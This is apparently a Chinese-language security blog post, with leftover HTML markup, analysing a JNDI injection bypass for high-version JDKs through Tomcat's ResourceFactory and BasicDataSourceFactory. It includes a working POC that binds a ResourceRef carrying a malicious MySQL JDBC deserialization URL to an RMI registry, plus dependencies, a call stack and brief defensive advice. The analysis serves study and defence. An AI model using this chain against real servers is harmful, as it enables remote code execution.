JNDI + FactoryBase 高版本绕过技术分析<\/h1>

一、高版本JDK对JNDI注入的限制<\/h2>
在高版本JDK中，对JNDI注入攻击增加了重要的安全防护。具体限制体现在：<\/p>
关键代码变更：<\/strong>
在 `javax.naming.spi.NamingManager#decodeObject<\/code> 方法中增加了一个if判断，该判断会检查reference的factory类位置是否为空。如果非空（即存在远程codebase），则会阻止后续的恶意类加载。<\/p>`

二、绕过原理分析<\/h2> 2.1 核心绕过思路<\/h3> 绕过高版本限制的关键在于使 Ref.GetFactoryClassLocation()<\/code> 返回空值。这意味着需要让ref对象的classFactoryLocation属性为空。<\/p> classFactoryLocation属性作用<\/strong>：该属性表示引用所指向对象的对应factory名称<\/li> 远程代码加载<\/strong>：对于低版本利用，该属性为codebase（远程代码URL地址）<\/li> 本地代码利用<\/strong>：如果对应的factory是本地代码，则该值为空，这是绕过高版本限制的关键<\/li> <\/ul> 2.2 利用条件<\/h3> 要成功利用需要满足以下条件：<\/p> 使用本地类进行利用<\/li> 该类必须是个工厂类，实现 javax.naming.spi.ObjectFactory<\/code> 接口<\/li> 该工厂类至少存在一个 getObjectInstance()<\/code> 方法<\/li> 在 NamingManager#getObjectFactoryFromReference<\/code> 中会对工厂类实例进行类型转换<\/li> <\/ol> 三、技术实现细节<\/h2> 3.1 利用类选择<\/h3> 选择使用 FactoryBase<\/code> 类及其实现类 ResourceFactory<\/code> 进行利用。<\/p> ResourceFactory的getObjectInstance方法关键逻辑：<\/strong><\/p> public<\/span> final<\/span> Object getObjectInstance<\/span>(<\/span>Object obj,<\/span> Name name,<\/span> Context nameCtx,<\/span> Hashtable<?,<\/span> ?><\/span> environment)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> if<\/span> (<\/span>this<\/span>.<\/span>isReferenceTypeSupported<\/span>(<\/span>obj))<\/span> {<\/span> <\/span><\/span> Reference ref =<\/span> (<\/span>Reference)<\/span>obj;<\/span> <\/span><\/span> Object linked =<\/span> this<\/span>.<\/span>getLinked<\/span>(<\/span>ref);<\/span> <\/span><\/span> <\/span><\/span> if<\/span> (<\/span>linked !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> linked;<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> ObjectFactory factory =<\/span> null<\/span>;<\/span> <\/span><\/span> RefAddr factoryRefAddr =<\/span> ref.<\/span>get<\/span>(<\/span>"factory"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> if<\/span> (<\/span>factoryRefAddr !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> \/\/ 加载自定义工厂类逻辑 <\/span><\/span><\/span><\/span> String factoryClassName =<\/span> factoryRefAddr.<\/span>getContent<\/span>().<\/span>toString<\/span>();<\/span> <\/span><\/span> ClassLoader tcl =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span> <\/span><\/span> Class<?><\/span> factoryClass =<\/span> tcl.<\/span>loadClass<\/span>(<\/span>factoryClassName);<\/span> <\/span><\/span> factory =<\/span> (<\/span>ObjectFactory)<\/span>factoryClass.<\/span>newInstance<\/span>();<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> factory =<\/span> this<\/span>.<\/span>getDefaultFactory<\/span>(<\/span>ref);<\/span> \/\/ 获取默认工厂 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> if<\/span> (<\/span>factory !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> factory.<\/span>getObjectInstance<\/span>(<\/span>obj,<\/span> name,<\/span> nameCtx,<\/span> environment);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.2 工厂获取机制<\/h3> 在 getDefaultFactory<\/code> 方法中：<\/p> 判断ClassName是否为 javax.sql.DataSource<\/code><\/li> 如果是，则获取 org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory<\/code><\/li> <\/ul> 3.3 BasicDataSourceFactory的关键方法<\/h3> public<\/span> Object getObjectInstance<\/span>(<\/span>Object obj,<\/span> Name name,<\/span> Context nameCtx,<\/span> Hashtable<?,<\/span> ?><\/span> environment)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> if<\/span> (<\/span>obj !=<\/span> null<\/span> &&<\/span> obj instanceof<\/span> Reference)<\/span> {<\/span> <\/span><\/span> Reference ref =<\/span> (<\/span>Reference)<\/span>obj;<\/span> <\/span><\/span> if<\/span> (!<\/span>"javax.sql.DataSource"<\/span>.<\/span>equals<\/span>(<\/span>ref.<\/span>getClassName<\/span>()))<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> \/\/ 属性验证和处理逻辑 <\/span><\/span><\/span><\/span> Properties properties =<\/span> new<\/span> Properties();<\/span> <\/span><\/span> String[]<\/span> arr$ =<\/span> ALL_PROPERTIES;<\/span> <\/span><\/span> \/\/ 遍历所有属性并设置到properties中 <\/span><\/span><\/span><\/span> return<\/span> createDataSource(<\/span>properties);<\/span> \/\/ 触发JDBC连接 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、环境搭建与POC构造<\/h2> 4.1 依赖配置<\/h3> <dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.javassist<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>javassist<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.25.0-GA<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.commons<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-dbcp2<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.12.0<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.tomcat<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>tomcat-catalina<\/artifactId><\/span> <\/span><\/span> <version><\/span>9.0.89<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.tomcat<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>tomcat-dbcp<\/artifactId><\/span> <\/span><\/span> <version><\/span>9.0.89<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>mysql<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>mysql-connector-java<\/artifactId><\/span> <\/span><\/span> <version><\/span>8.0.19<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>commons-collections<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-collections<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.2.1<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>4.2 POC构造代码<\/h3> Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span> <\/span><\/span>ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.sql.DataSource"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> <\/span><\/span> "org.apache.naming.factory.ResourceFactory"<\/span>,<\/span> null<\/span>);<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"driverClassName"<\/span>,<\/span> "com.mysql.cj.jdbc.Driver"<\/span>));<\/span> <\/span><\/span>String JDBC_URL =<\/span> "jdbc:mysql:\/\/127.0.0.1:3309\/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=root&useSSL=false"<\/span>;<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"url"<\/span>,<\/span> JDBC_URL));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"username"<\/span>,<\/span> "root"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"initialSize"<\/span>,<\/span> "1"<\/span>));<\/span> <\/span><\/span>ReferenceWrapper referenceWrapper =<\/span> new<\/span> ReferenceWrapper(<\/span>ref);<\/span> <\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"calc"<\/span>,<\/span> referenceWrapper);<\/span> <\/span><\/span><\/code><\/pre>五、攻击流程分析<\/h2> 5.1 关键步骤<\/h3> 初始化注册表<\/strong>：创建RMI注册表<\/li> 构造ResourceRef<\/strong>：设置类名为javax.sql.DataSource，工厂类为org.apache.naming.factory.ResourceFactory<\/li> 配置JDBC参数<\/strong>：设置驱动类名、连接URL、用户名等<\/li> 绑定引用<\/strong>：将构造的ReferenceWrapper绑定到RMI注册表<\/li> <\/ol> 5.2 调用栈分析<\/h3> 完整的调用栈为：<\/p> createDataSource:339, BasicDataSourceFactory (org.apache.tomcat.dbcp.dbcp2) getObjectInstance:275, BasicDataSourceFactory (org.apache.tomcat.dbcp.dbcp2) getObjectInstance:94, FactoryBase (org.apache.naming.factory) getObjectInstance:321, NamingManager (javax.naming.spi) decodeObject:499, RegistryContext (com.sun.jndi.rmi.registry) lookup:138, RegistryContext (com.sun.jndi.rmi.registry) lookup:205, GenericURLContext (com.sun.jndi.toolkit.url) lookup:417, InitialContext (javax.naming) main:14, JNDI_Test (JNDI) <\/code><\/pre> 六、技术要点总结<\/h2> 6.1 成功绕过的关键<\/h3> classFactoryLocation为空<\/strong>：使ref对象的classFactoryLocation属性为空，绕过JDK的高版本限制<\/li> 利用本地工厂类<\/strong>：通过Tomcat内置的ResourceFactory和BasicDataSourceFactory链式调用<\/li> JDBC连接触发<\/strong>：最终通过构造恶意JDBC连接参数触发反序列化攻击<\/li> <\/ol> 6.2 依赖组件要求<\/h3> Tomcat DBCP组件（提供ResourceFactory和BasicDataSourceFactory）<\/li> MySQL JDBC驱动（用于构造恶意连接参数）<\/li> 相应的依赖版本兼容性<\/li> <\/ul> 6.3 防御建议<\/h3> 升级JDK到最新版本<\/li> 限制不必要的JNDI查找操作<\/li> 对不受信任的RMI注册表访问进行限制<\/li> 监控和过滤恶意的JDBC连接参数<\/li> <\/ol> 此技术利用了Tomcat DBCP组件中的合法功能链，通过巧妙的参数构造绕过了高版本JDK的安全限制，实现了JNDI注入攻击的再利用。<\/p>